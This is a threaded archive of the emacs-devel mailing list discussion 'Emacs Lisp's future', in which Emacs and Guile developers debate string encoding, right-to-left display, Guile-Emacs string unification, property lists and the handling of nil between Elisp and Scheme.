* Re: Emacs Lisp's future 2014-09-27 10:37 ` Stephen J. Turnbull @ 2014-09-27 11:13 ` David Kastrup 2014-09-27 12:00 ` Eli Zaretskii 2014-09-27 15:34 ` Stephen J. Turnbull 0 siblings, 2 replies; 404+ messages in thread From: David Kastrup @ 2014-09-27 11:13 UTC (permalink / raw) To: Stephen J. Turnbull; +Cc: Kenichi Handa, Eli Zaretskii, dmantipov, emacs-devel "Stephen J. Turnbull" <stephen@xemacs.org> writes: > Eli Zaretskii writes: > > > I take it that you have studied the charsets for which we use > > codepoints above 0x10FFFF, and concluded that they all fit in the > > 2*64K+6.4K PUA space provided by Unicode? > > No, I've studied the coded character sets that are actually used by > real people in this world, and concluded that for practical purposes, For practical purposes, real people use Microsoft Word. > the Unicode coded character set plus the PUA permits representing all > of them satisfactorily for a TTY, and that the additional burden of > disambiguating them (eg, for font choice in a GUI) should be handled > by markup (eg, the XML lang attribute in text/* representations, and > text properties in Emacs). Emacs has invested a lot of work and energy into getting encodings right. MULE was the principal reason for the last large migration of Emacs users to XEmacs (around Emacs 20), and it was a significant reason for a slow but steady migration trickle back when multinational character sets became ubiquitous and the initial painful investment of Emacs into them paid back in the form of a longer matured implementation. I remember XEmacs having an implementation of the "works for real people for practical purposes" kind where the principal maintainers do not appear to be fundamentally immersed in the problem space. Because those for which multinational character sets were an essential feature went to work on and with Emacs instead. Whether or not that's revisionism, I think that there is little doubt that Emacs has a solid history of experience dealing with Far Eastern character sets and texts. The same cannot be said for R->L typesetting. However, the problems specific to R->L typesetting are mostly not in the character set and string handling area but rather concern the display algorithms where we already found that supporting all the functionality of Emacs is not well-supported by industry-standard solutions like Pango. In short, it is not likely we are talking about a no-brainer regarding rebasing MULE on something else. If we were, it would appear to me that XEmacs would have had more to gain from such a step than Emacs, and there is likely some reason that they chose not to do so. -- David Kastrup ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-09-27 11:13 ` David Kastrup @ 2014-09-27 12:00 ` Eli Zaretskii 2014-09-27 14:04 ` Stefan Monnier 2014-09-27 15:34 ` Stephen J. Turnbull 1 sibling, 1 reply; 404+ messages in thread From: Eli Zaretskii @ 2014-09-27 12:00 UTC (permalink / raw) To: David Kastrup; +Cc: handa, stephen, dmantipov, emacs-devel > From: David Kastrup <dak@gnu.org> > Cc: Eli Zaretskii <eliz@gnu.org>, Kenichi Handa <handa@gnu.org>, dmantipov@yandex.ru, emacs-devel@gnu.org > Date: Sat, 27 Sep 2014 13:13:26 +0200 > > However, the problems specific to R->L typesetting are mostly not in the > character set and string handling area but rather concern the display > algorithms where we already found that supporting all the functionality > of Emacs is not well-supported by industry-standard solutions like > Pango. Only people who don't speak any of the R2L languages can seriously claim that using Pango/Cairo is the way to support R2L in Emacs. There are just too many quirks that Emacs needs for user satisfaction that an external GP renderer can never provide. Using Pango also means you are at the mercy of their developers as far as bidi is concerned. And it doesn't help that the development in that area is not really "alive and kicking" as one would hope; e.g., the latest changes in UAX#9, released with Unicode 6.3 a year ago, are still not supported in Pango or FriBidi. Besides, using Pango means no bidi in text-mode frames. (Some people say this should be delegated to bidi-aware terminal emulators, like PuTTY and some Linux-based emulator whose name I don't remember, but that's again only because those people don't use the R2L scripts. Doing bidi display for TTY Emacs this way is simply unworkable.) ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-09-27 12:00 ` Eli Zaretskii @ 2014-09-27 14:04 ` Stefan Monnier 2014-09-27 14:24 ` David Kastrup 0 siblings, 1 reply; 404+ messages in thread From: Stefan Monnier @ 2014-09-27 14:04 UTC (permalink / raw) To: Eli Zaretskii; +Cc: handa, stephen, David Kastrup, dmantipov, emacs-devel Could you move on to some other discussion? I mean, it's not like this is a problem we need to fix now (if ever). So let's cross this bridge when we get there. Stefan >>>>> "Eli" == Eli Zaretskii <eliz@gnu.org> writes: >> From: David Kastrup <dak@gnu.org> >> Cc: Eli Zaretskii <eliz@gnu.org>, Kenichi Handa <handa@gnu.org>, >> dmantipov@yandex.ru, emacs-devel@gnu.org >> Date: Sat, 27 Sep 2014 13:13:26 +0200 >> >> However, the problems specific to R->L typesetting are mostly not in the >> character set and string handling area but rather concern the display >> algorithms where we already found that supporting all the functionality >> of Emacs is not well-supported by industry-standard solutions like >> Pango. > Only people who don't speak any of the R2L languages can seriously > claim that using Pango/Cairo is the way to support R2L in Emacs. > There are just too many quirks that Emacs needs for user satisfaction > that an external GP renderer can never provide. > Using Pango also means you are at the mercy of their developers as far > as bidi is concerned. And it doesn't help that the development in > that area is not really "alive and kicking" as one would hope; e.g., > the latest changes in UAX#9, released with Unicode 6.3 a year ago, are > still not supported in Pango or FriBidi. > Besides, using Pango means no bidi in text-mode frames. (Some people > say this should be delegated to bidi-aware terminal emulators, like > PuTTY and some Linux-based emulator whose name I don't remember, but > that's again only because those people don't use the R2L scripts. > Doing bidi display for TTY Emacs this way is simply unworkable.) ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-09-27 14:04 ` Stefan Monnier @ 2014-09-27 14:24 ` David Kastrup 2014-09-27 15:24 ` Stefan Monnier ` (2 more replies) 0 siblings, 3 replies; 404+ messages in thread From: David Kastrup @ 2014-09-27 14:24 UTC (permalink / raw) To: Stefan Monnier; +Cc: handa, Eli Zaretskii, dmantipov, stephen, emacs-devel Stefan Monnier <monnier@iro.umontreal.ca> writes: > Could you move on to some other discussion? > I mean, it's not like this is a problem we need to fix now (if ever). Uh, Pango was an analogy example. The actual question was whether Emacs can or should delegate its character encoding/decoding processing (not really significantly related to Pango but subject to similar considerations) to GUILE's current mechanisms. Which seem to be libunistring via libiconv (both GNU libraries it would appear) rather than the ICU mentioned elsewhere. > So let's cross this bridge when we get there. The GUILE bridge is there. Robin Templeton's status of the port is that it is mostly complete, with strings/buffers being the most notable part obliterating acceptable performance via thick glue layers between Emacs' and GUILE's different implementations of similar concepts. Removing the thick glue layer requires that Emacs and GUILE strings (and Emacs buffers and GUILE whatever) become exchangeable and offer the same operations without impacting performance for either. -- David Kastrup ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-09-27 14:24 ` David Kastrup @ 2014-09-27 15:24 ` Stefan Monnier 2014-09-27 15:41 ` David Kastrup 2014-09-27 17:04 ` Taylan Ulrich Bayirli/Kammer 2014-09-27 19:33 ` Robin Templeton 2 siblings, 1 reply; 404+ messages in thread From: Stefan Monnier @ 2014-09-27 15:24 UTC (permalink / raw) To: David Kastrup; +Cc: handa, Eli Zaretskii, dmantipov, stephen, emacs-devel >> Could you move on to some other discussion? >> I mean, it's not like this is a problem we need to fix now (if ever). > Uh, Pango was an analogy example. The actual question was whether Emacs > can or should delegate its character encoding/decoding processing (not > really significantly related to Pango but subject to similar > considerations) to GUILE's current mechanisms. Which seem to be > libunistring via libiconv (both GNU libraries it would appear) rather > than the ICU mentioned elsewhere. And, again: it's not like this is a problem we need to fix now (if ever). > The GUILE bridge is there. Robin Templeton's status of the port is that > it is mostly complete, with strings/buffers being the most notable part > obliterating acceptable performance via thick glue layers between Emacs' > and GUILE's different implementations of similar concepts. Do you know this to be a fact? AFAIK, Guile-Emacs could perfectly live with having Emacs buffers, Emacs strings, and Scheme strings, with no extra cost, except when you *want* to convert between them (but as long as you don't run any Scheme, you shouldn't need/want to do any such conversion). Stefan ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-09-27 15:24 ` Stefan Monnier @ 2014-09-27 15:41 ` David Kastrup 2014-09-27 15:57 ` Stefan Monnier 0 siblings, 1 reply; 404+ messages in thread From: David Kastrup @ 2014-09-27 15:41 UTC (permalink / raw) To: Stefan Monnier; +Cc: handa, Eli Zaretskii, dmantipov, stephen, emacs-devel Stefan Monnier <monnier@iro.umontreal.ca> writes: >>> Could you move on to some other discussion? >>> I mean, it's not like this is a problem we need to fix now (if ever). >> Uh, Pango was an analogy example. The actual question was whether Emacs >> can or should delegate its character encoding/decoding processing (not >> really significantly related to Pango but subject to similar >> considerations) to GUILE's current mechanisms. Which seem to be >> libunistring via libiconv (both GNU libraries it would appear) rather >> than the ICU mentioned elsewhere. > > And, again: it's not like this is a problem we need to fix now (if ever). > >> The GUILE bridge is there. Robin Templeton's status of the port is that >> it is mostly complete, with strings/buffers being the most notable part >> obliterating acceptable performance via thick glue layers between Emacs' >> and GUILE's different implementations of similar concepts. > > Do you know this to be a fact? <URL:http://www.emacswiki.org/emacs/GuileEmacs#toc9> is about keeping them separate. <URL:http://www.emacswiki.org/emacs/GuileEmacsTodo> lists "Unify Elisp and Scheme strings". I thought I read something from Robin about buffers/strings being a performance issue, but searching on the respective developer lists points rather to dynamic scopes and/or buffer-local variables. > AFAIK, Guile-Emacs could perfectly live with having Emacs buffers, > Emacs strings, and Scheme strings, with no extra cost, except when you > *want* to convert between them (but as long as you don't run any > Scheme, you shouldn't need/want to do any such conversion). GUILE runs on a VM and obviously the native data types known to the VM will be favored regarding its performance. It may be that the cost of processing strings is such that it will dominate the VM code processing, but since one of the most fundamental data types of both Scheme and Lisp are interned strings (namely symbols), I'd still expect quite a bit of unnecessary churn when Emacs strings cannot just use GUILE primitives. Not least of all maintaining two sets of primitives. -- David Kastrup ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-09-27 15:41 ` David Kastrup @ 2014-09-27 15:57 ` Stefan Monnier 2014-09-27 16:25 ` David Kastrup 0 siblings, 1 reply; 404+ messages in thread From: Stefan Monnier @ 2014-09-27 15:57 UTC (permalink / raw) To: David Kastrup; +Cc: handa, Eli Zaretskii, dmantipov, stephen, emacs-devel >>> The GUILE bridge is there. Robin Templeton's status of the port is that >>> it is mostly complete, with strings/buffers being the most notable part >>> obliterating acceptable performance via thick glue layers between Emacs' >>> and GUILE's different implementations of similar concepts. >> Do you know this to be a fact? > <URL:http://www.emacswiki.org/emacs/GuileEmacs#toc9> is about keeping > them separate. > <URL:http://www.emacswiki.org/emacs/GuileEmacsTodo> lists "Unify Elisp > and Scheme strings". > I thought I read something from Robin about buffers/strings being a > performance issue, but searching on the respective developer lists > points rather to dynamic scopes and/or buffer-local variables. IOW, you do *not* know for a fact that this lack of unification is a current source of performance problems. Thought so. Stefan ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-09-27 15:57 ` Stefan Monnier @ 2014-09-27 16:25 ` David Kastrup 2014-09-27 17:23 ` Stefan Monnier 0 siblings, 1 reply; 404+ messages in thread From: David Kastrup @ 2014-09-27 16:25 UTC (permalink / raw) To: Stefan Monnier; +Cc: handa, Eli Zaretskii, dmantipov, stephen, emacs-devel Stefan Monnier <monnier@iro.umontreal.ca> writes: >>>> The GUILE bridge is there. Robin Templeton's status of the port is that >>>> it is mostly complete, with strings/buffers being the most notable part >>>> obliterating acceptable performance via thick glue layers between Emacs' >>>> and GUILE's different implementations of similar concepts. >>> Do you know this to be a fact? >> <URL:http://www.emacswiki.org/emacs/GuileEmacs#toc9> is about keeping >> them separate. >> <URL:http://www.emacswiki.org/emacs/GuileEmacsTodo> lists "Unify Elisp >> and Scheme strings". >> I thought I read something from Robin about buffers/strings being a >> performance issue, but searching on the respective developer lists >> points rather to dynamic scopes and/or buffer-local variables. > > IOW, you do *not* know for a fact that this lack of unification is > a current source of performance problems. > Thought so. Shrug. I'm currently working on integrating GUILE 2.0 into LilyPond, and GUILE 2.0 has Unicode strings which are either UCS-8 or UCS-32 in the strings and UTF-8 in string ports (which are sort of like Emacs buffers on steroid withdrawal). So at the current point of time, Emacs and GUILE strings would need reencoding/decoding at every call gate anyway as long as string access is not abstracted well enough in the Emacs code base that the different internal coding would not require code changes. The VM costs would be negligible in comparison with that. I don't think that having to retain a separate implementation of strings in Emacs makes much sense in the course of integrating GUILE and Emacs. "reencode at every call gate" is not feasible for tight interaction, and tight interaction is desirable for an extension language after all. In our case, LilyPond has a lot of head-scratching to do in order to arrive at a state where GUILE and C++ strings can be passed through the system reasonably efficient since LilyPond _is_ designed to tightly interact with GUILE. The basic expediency mechanism is to tell GUILE "this is all latin-1" which it will then keep in UCS-8. Whenever there is an interest in Unicode string processing, we need to reencode. LilyPond itself is actually talking UTF-8 to its users. This kind of "we work with UTF-8, but consider it to be UCS-8 instead since we cannot or do not want to afford the price you demand for treating it as UTF-8" is not really a satisfactory solution, and I expect this to become an issue in other applications. So I pretty much expect that we'll see GUILE migrating to an UTF-8-based string representation eventually, with all the head-scratching regarding indexing and rewriting strings (aset anybody?) that Emacs has seen. In case that happens, matching Emacs strings would make a lot of sense. Admittedly, that is more a problem of GUILE than Emacs. -- David Kastrup ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-09-27 16:25 ` David Kastrup @ 2014-09-27 17:23 ` Stefan Monnier 2014-09-28 23:22 ` Richard Stallman 0 siblings, 1 reply; 404+ messages in thread From: Stefan Monnier @ 2014-09-27 17:23 UTC (permalink / raw) To: David Kastrup; +Cc: handa, Eli Zaretskii, dmantipov, stephen, emacs-devel > I don't think that having to retain a separate implementation of strings > in Emacs makes much sense in the course of integrating GUILE and Emacs. There's integration and integration. Currently Guile-Emacs is about replacing the GC and byte-code interpreter of Emacs with Guile's. Most of the actual primitives used are Emacs's own, AFAIK (with some exceptions, such as the things that touch cons cells and numbers, IIUC). I'm not really interested in spending time improving Guile. The goal of Guile-Emacs (from Emacs's point of view) is to use some pre-existing VM so as to avoid spending time on Emacs's own. So if we can't make use of Guile's strings because they're not good enough, then we won't use them. Of course, maybe we'll have to manipulate Guile's strings in order to use Guile's FFI or some Scheme library. If/when that becomes a performance problem, we'll see what needs to be done about that. Until then: it's not like this is a problem we need to fix now (if ever). -- Stefan ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-09-27 17:23 ` Stefan Monnier @ 2014-09-28 23:22 ` Richard Stallman 2014-09-29 1:33 ` Stefan Monnier 2014-10-05 7:53 ` Mark H Weaver 0 siblings, 2 replies; 404+ messages in thread From: Richard Stallman @ 2014-09-28 23:22 UTC (permalink / raw) To: Stefan Monnier; +Cc: dak, dmantipov, emacs-devel, handa, eliz, stephen [[[ To any NSA and FBI agents reading my email: please consider ]]] [[[ whether defending the US Constitution against all enemies, ]]] [[[ foreign or domestic, requires you to follow Snowden's example. ]]] So if we can't make use of Guile's strings because they're not good enough, then we won't use them. Unfortunately, that would put a major crimp in interoperability between Emacs Lisp programs and Scheme programs. Can the Guile developers work on making Guile strings flexible enough that Emacs can use them? So that they can do the jobs Emacs Lisp strings do? -- Dr Richard Stallman President, Free Software Foundation 51 Franklin St Boston MA 02110 USA www.fsf.org www.gnu.org Skype: No way! That's nonfree (freedom-denying) software. Use Ekiga or an ordinary phone call. ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-09-28 23:22 ` Richard Stallman @ 2014-09-29 1:33 ` Stefan Monnier 2014-09-29 20:48 ` Richard Stallman 2014-10-05 7:53 ` Mark H Weaver 1 sibling, 1 reply; 404+ messages in thread From: Stefan Monnier @ 2014-09-29 1:33 UTC (permalink / raw) To: Richard Stallman; +Cc: dak, dmantipov, emacs-devel, handa, eliz, stephen > Unfortunately, that would put a major crimp in interoperability between > Emacs Lisp programs and Scheme programs. Such interoperability would be nice to have, indeed, but is not absolutely necessary. In any case this is a problem that Emacs can't solve, so if you want to discuss it, please do that on Guile's mailing-list. Stefan ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-09-29 1:33 ` Stefan Monnier @ 2014-09-29 20:48 ` Richard Stallman 0 siblings, 0 replies; 404+ messages in thread From: Richard Stallman @ 2014-09-29 20:48 UTC (permalink / raw) To: Stefan Monnier; +Cc: dak, dmantipov, emacs-devel, handa, eliz, stephen [[[ To any NSA and FBI agents reading my email: please consider ]]] [[[ whether defending the US Constitution against all enemies, ]]] [[[ foreign or domestic, requires you to follow Snowden's example. ]]] In any case this is a problem that Emacs can't solve, so if you want to discuss it, please do that on Guile's mailing-list. Guile developers need to talk with Emacs developers to find a good solution. I posted here since the Guile developers seem to be here along with the Emacs developers. -- Dr Richard Stallman President, Free Software Foundation 51 Franklin St Boston MA 02110 USA www.fsf.org www.gnu.org Skype: No way! That's nonfree (freedom-denying) software. Use Ekiga or an ordinary phone call. ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-09-28 23:22 ` Richard Stallman 2014-09-29 1:33 ` Stefan Monnier @ 2014-10-05 7:53 ` Mark H Weaver 2014-10-05 9:01 ` David Kastrup ` (3 more replies) 1 sibling, 4 replies; 404+ messages in thread From: Mark H Weaver @ 2014-10-05 7:53 UTC (permalink / raw) To: Richard Stallman Cc: dak, dmantipov, emacs-devel, handa, Stefan Monnier, eliz, stephen Richard Stallman <rms@gnu.org> writes: > So if we can't make use of Guile's strings because they're not good > enough, then we won't use them. > > Unfortunately, that would put a major crimp in interoperability between > Emacs Lisp programs and Scheme programs. > > Can the Guile developers work on making Guile strings flexible > enough that Emacs can use them? So that they can do the jobs > Emacs Lisp strings do? I would like to change Guile's internal string representation to use a generalization of UTF-8, as used by Emacs. There are two sticking points that require more thought, however: * I'm concerned that there are security implications to supporting the "raw byte" code points. I can expand on this more if you'd like. However, I think this will not be a problem, because the string<->bytevector conversion procedures could support two modes of operation: one mode that supports these raw bytes, for use by emacs and maybe some other purposes (e.g. dealing with POSIX file names), and another mode that refuses to accept or produce invalid UTF-8, which would be used by programs where security is a concern. I'm inclined to make the standard Scheme procedures use the strict mode by default. * I'm not sure that Guile strings should include property lists. One can reasonably assume that competent Elisp programmers will keep in mind that Elisp strings are more than just characters, but we cannot expect that of Scheme programmers, and they've never had any tools to deal with it in any case. Emacs lisp includes procedures such as 'substring-no-properties', but Scheme has never had anything like that. Supporting property lists in Scheme raises difficult questions such as: * What should the Scheme procedures 'string=?' and 'equal?' do when comparing two strings with the equal character sequences but unequal property lists? * Should Scheme procedures such as 'substring', 'string-append', 'string-upcase', etc, propagate the associated property list data? * Are there security implications to carrying around and possibly propagating (via Scheme's "substring") extra information that is effectively invisible to all procedures that have ever been available in Scheme? * What should Scheme's 'write' do when applied to a string that includes a property list? ('write' is analogous to 'prin1'). Security concerns are more important for Guile than for Emacs, because Guile is already being used to implement network programs such as web servers, and generally aims to support a much wider range of applications. At the very least, we can plan to eventually make Emacs strings representable as Guile strings plus property lists. Going further will require more consideration, I think. * * * While we're on the subject of interoperability between Emacs Lisp and Scheme programs, I'm concerned about nil. Modern Scheme requires that () and #f are distinct objects, and that () is treated as true by 'if'. This has been the case for long enough now that it's not uncommon for modern Scheme code to depend on these facts. Of course, Elisp code depends on the end-of-list and false values being the same object. The way we're coping with this is by having three distinct objects in Guile: (), #f, and #nil, where both () and #nil are considered end-of-list markers by 'null?', both #f and #nil are considered false by Scheme 'if', and all three are seen as null by Elisp. First of all, clearly this is not quite correct. Scheme code might assume that if a value is false, it cannot be the empty list, or vice versa, but the hope is that it will mostly work in practice. However, I see a problem that will become more common if Scheme and Elisp code become more intertwined. The problem occurs when Elisp code sees that a value 'x' is null and then copies it somewhere, where the original 'x' was conceptually an end-of-list, but the copy is conceptually a boolean false (or vice versa). (I'm aware that for some Elisp values, it may not even be possible to say it's "conceptually an end-of-list" or "conceptually a boolean false", but please bear with me). The problem comes when 'x' originated in Scheme code as (), is later copied by Elisp code into something that's conceptually a boolean, and then that copy is inspected by Scheme code. The intent was that the copied boolean would be false, but the Scheme code will see () and treat it as true. What do you think? Do I worry too much? :) Mark ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-05 7:53 ` Mark H Weaver @ 2014-10-05 9:01 ` David Kastrup 2014-10-05 10:43 ` Stephen J. Turnbull ` (2 subsequent siblings) 3 siblings, 0 replies; 404+ messages in thread From: David Kastrup @ 2014-10-05 9:01 UTC (permalink / raw) To: Mark H Weaver Cc: Richard Stallman, dmantipov, emacs-devel, handa, Stefan Monnier, eliz, stephen Mark H Weaver <mhw@netris.org> writes: > * I'm not sure that Guile strings should include property lists. I already mentioned that string ports could be turned into the basic underlying data representation for Emacs buffers. That's one case where it is quite obvious that a string port alone is not a sufficient representation. > One can reasonably assume that competent Elisp programmers will keep > in mind that Elisp strings are more than just characters, but we > cannot expect that of Scheme programmers, and they've never had any > tools to deal with it in any case. Emacs lisp includes procedures > such as 'substring-no-properties', but Scheme has never had anything > like that. > > Supporting property lists in Scheme raises difficult questions > such as: > > * What should the Scheme procedures 'string=?' and 'equal?' do when > comparing two strings with the equal character sequences but > unequal property lists? > > * Should Scheme procedures such as 'substring', 'string-append', > 'string-upcase', etc, propagate the associated property list > data? > > * Are there security implications to carrying around and possibly > propagating (via Scheme's "substring") extra information that is > effectively invisible to all procedures that have ever been > available in Scheme? > > * What should Scheme's 'write' do when applied to a string that > includes a property list? ('write' is analogous to 'prin1'). I should think that GOOPS, the basis for GUILE's builtin object hierarchy, basically provides all the necessary mechanisms for transparently making "richer" string variants maintain their additional data when being manipulated by standard operations. So while Emacs development would likely benefit from the willingness to refactor some string internals in a different manner, ultimately the work of Emacs data implementors should not require tight interaction with GUILE development. > While we're on the subject of interoperability between Emacs Lisp and > Scheme programs, I'm concerned about nil. [...] > The problem comes when 'x' originated in Scheme code as (), is later > copied by Elisp code into something that's conceptually a boolean, and > then that copy is inspected by Scheme code. The intent was that the > copied boolean would be false, but the Scheme code will see () and treat > it as true. > > What do you think? Do I worry too much? :) No. It will be the main recurring interoperation headache. -- David Kastrup ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-05 7:53 ` Mark H Weaver 2014-10-05 9:01 ` David Kastrup @ 2014-10-05 10:43 ` Stephen J. Turnbull 2014-10-05 11:10 ` David Kastrup 2014-10-05 14:30 ` Mark H Weaver 2014-10-05 21:49 ` Richard Stallman 2014-10-05 21:49 ` Richard Stallman 3 siblings, 2 replies; 404+ messages in thread From: Stephen J. Turnbull @ 2014-10-05 10:43 UTC (permalink / raw) To: Mark H Weaver Cc: dak, Richard Stallman, dmantipov, emacs-devel, handa, Stefan Monnier, eliz Mark H Weaver writes: > I would like to change Guile's internal string representation to use a > generalization of UTF-8, as used by Emacs. There are two sticking > points that require more thought, however: > > * I'm concerned that there are security implications to supporting > the "raw byte" code points. There are greater security implications to using the full repertoire of Unicode (so-called confusables for a start). > However, I think this will not be a problem, because the > string<->bytevector conversion procedures could support two modes of > operation: one mode that supports these raw bytes, for use by emacs > and maybe some other purposes (e.g. dealing with POSIX file names), > and another mode that refuses to accept or produce invalid UTF-8, I'm not sure what you mean by "mode", but this behavior should be decided for each stream. IMO Python does this correctly (although its internal representation is fixed-width, not UTF-8). Specifically, raw bytes in I/O streams are treated as errors, and when encountered an error handler (which is specified stream-by-stream) decides how to treat them. Besides the in band "special character" representation, 'strict' (raise error) must be provided. Other handlers provided by Python include 'ignore' (drop from the stream), 'replace' (with a constant replacement character), 'backslashreplace' (replace with a hexadecimal representation such as "\x1F4A9") and 'xmlreplace' (replace with a character entity) handlers are provided. > Supporting property lists in Scheme raises difficult questions > such as: Difficult, really? > * What should the Scheme procedures 'string=?' and 'equal?' do when > comparing two strings with the equal character sequences but > unequal property lists? Ignore the property list. > * Should Scheme procedures such as 'substring', 'string-append', > 'string-upcase', etc, propagate the associated property list > data? Ignore the property list. > * Are there security implications to carrying around and possibly > propagating (via Scheme's "substring") extra information that is > effectively invisible to all procedures that have ever been > available in Scheme? Ignore the property list. > * What should Scheme's 'write' do when applied to a string that > includes a property list? ('write' is analogous to 'prin1'). Ignore the property list. There, that wasn't hard, was it? Scheme itself really needs only to provide a setter and a getter for the property list, and leave everything else up to Emacs (at first, anyway). If you're really worried about the security implications, provide a interpreter instance switch at invocation time (or even compile time) so that feature is only available in invocations that explicitly request it. This would default to on for Emacs processes, off for "vanilla" Guile, and other applications that embed special configurations of Guile can make their own choice. > Security concerns are more important for Guile than for Emacs, because > Guile is already being used to implement network programs such as web > servers, and generally aims to support a much wider range of > applications. Obviously, you don't know Emacs very well. Emacs is the Swiss Army knife of the software world. It is an operating system, a system library, an application development platform and an application. (We also walk dogs.) > What do you think? Do I worry too much [about nothing]? :) Listen to your Uncle David on this one. You should treat every instance of nil as a biohazard. ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-05 10:43 ` Stephen J. Turnbull @ 2014-10-05 11:10 ` David Kastrup 2014-10-05 11:56 ` Stephen J. Turnbull 2014-10-05 14:30 ` Mark H Weaver 1 sibling, 1 reply; 404+ messages in thread From: David Kastrup @ 2014-10-05 11:10 UTC (permalink / raw) To: Stephen J. Turnbull Cc: Richard Stallman, Mark H Weaver, dmantipov, emacs-devel, handa, Stefan Monnier, eliz "Stephen J. Turnbull" <stephen@xemacs.org> writes: > > What do you think? Do I worry too much [about nothing]? :) > > Listen to your Uncle David on this one. You should treat every > instance of nil as a biohazard. That would make about as much sense as treating every bacterium as a biohazard. The nil problem is going to be defining the relation between Elisp and Scheme programming like pointers define the relation between C and algorithms. The Fortran language is defined in a manner that when you use aliasing, anything can happen. The C language is defined in a manner that when you don't use aliasing, nothing can happen. -- David Kastrup ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-05 11:10 ` David Kastrup @ 2014-10-05 11:56 ` Stephen J. Turnbull 0 siblings, 0 replies; 404+ messages in thread From: Stephen J. Turnbull @ 2014-10-05 11:56 UTC (permalink / raw) To: David Kastrup Cc: Richard Stallman, Mark H Weaver, dmantipov, emacs-devel, handa, Stefan Monnier, eliz David Kastrup writes: > like pointers define the relation between C and algorithms. Did somebody mention biohazards? It seems to me that the analogy between passing Lisp nil to Scheme and passing C pointers to anything is quite good at a high level. Every instance must be check up down and sideways for possible hazards. ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-05 10:43 ` Stephen J. Turnbull 2014-10-05 11:10 ` David Kastrup @ 2014-10-05 14:30 ` Mark H Weaver 2014-10-05 15:48 ` Stephen J. Turnbull 1 sibling, 1 reply; 404+ messages in thread From: Mark H Weaver @ 2014-10-05 14:30 UTC (permalink / raw) To: Stephen J. Turnbull Cc: dak, Richard Stallman, dmantipov, emacs-devel, handa, Stefan Monnier, eliz "Stephen J. Turnbull" <stephen@xemacs.org> writes: > > What do you think? Do I worry too much [about nothing]? :) > > Listen to your Uncle David on this one. You should treat every > instance of nil as a biohazard. If you had actually read what I wrote, you'd know that in the case I outlined, there is no instance of nil at all. Mark ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-05 14:30 ` Mark H Weaver @ 2014-10-05 15:48 ` Stephen J. Turnbull 2014-10-05 18:29 ` Mark H Weaver 0 siblings, 1 reply; 404+ messages in thread From: Stephen J. Turnbull @ 2014-10-05 15:48 UTC (permalink / raw) To: Mark H Weaver Cc: dak, Richard Stallman, dmantipov, emacs-devel, handa, Stefan Monnier, eliz Mark H Weaver writes: > in the case I outlined, there is no instance of nil at all. If you say so. ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-05 15:48 ` Stephen J. Turnbull @ 2014-10-05 18:29 ` Mark H Weaver 0 siblings, 0 replies; 404+ messages in thread From: Mark H Weaver @ 2014-10-05 18:29 UTC (permalink / raw) To: Stephen J. Turnbull Cc: dak, Richard Stallman, dmantipov, emacs-devel, handa, Stefan Monnier, eliz "Stephen J. Turnbull" <stephen@xemacs.org> writes: > Mark H Weaver writes: > > > in the case I outlined, there is no instance of nil at all. > > If you say so. Am I mistaken? Where is the instance of nil? Mark ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-05 7:53 ` Mark H Weaver 2014-10-05 9:01 ` David Kastrup 2014-10-05 10:43 ` Stephen J. Turnbull @ 2014-10-05 21:49 ` Richard Stallman [not found] ` <"<83lhotme1e.fsf"@gnu.org> ` (2 more replies) 2014-10-05 21:49 ` Richard Stallman 3 siblings, 3 replies; 404+ messages in thread From: Richard Stallman @ 2014-10-05 21:49 UTC (permalink / raw) To: Mark H Weaver; +Cc: dak, dmantipov, emacs-devel, handa, monnier, eliz, stephen [[[ To any NSA and FBI agents reading my email: please consider ]]] [[[ whether defending the US Constitution against all enemies, ]]] [[[ foreign or domestic, requires you to follow Snowden's example. ]]] * I'm concerned that there are security implications to supporting the "raw byte" code points. I can expand on this more if you'd like. I'd like to know how it is that "raw bytes" have security implications. Are there programs that make assumptions about the contents of strings? That seems like bad design. -- Dr Richard Stallman President, Free Software Foundation 51 Franklin St Boston MA 02110 USA www.fsf.org www.gnu.org Skype: No way! That's nonfree (freedom-denying) software. Use Ekiga or an ordinary phone call. ^ permalink raw reply [flat|nested] 404+ messages in thread
[parent not found: <"<83lhotme1e.fsf"@gnu.org>]
